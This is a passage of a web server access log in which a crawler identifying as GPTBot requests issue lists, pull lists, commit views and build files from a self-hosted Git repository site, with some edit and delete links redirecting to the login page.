GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:19:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog" [Client 74.7.227.38] [Length 30629] [Gzip 7.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:19:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog" [Client 74.7.227.38] [Length 65174] [Gzip 15.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:19:04:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:19:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:04:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:19:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:19:04:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:19:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:19:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=closed&type=all" +[17/Feb/2026:19:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:19:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:19:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:04:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:04:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:04:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 11200] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:19:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15268] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11135] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:05:10 +0000] - 200 200 - GET https 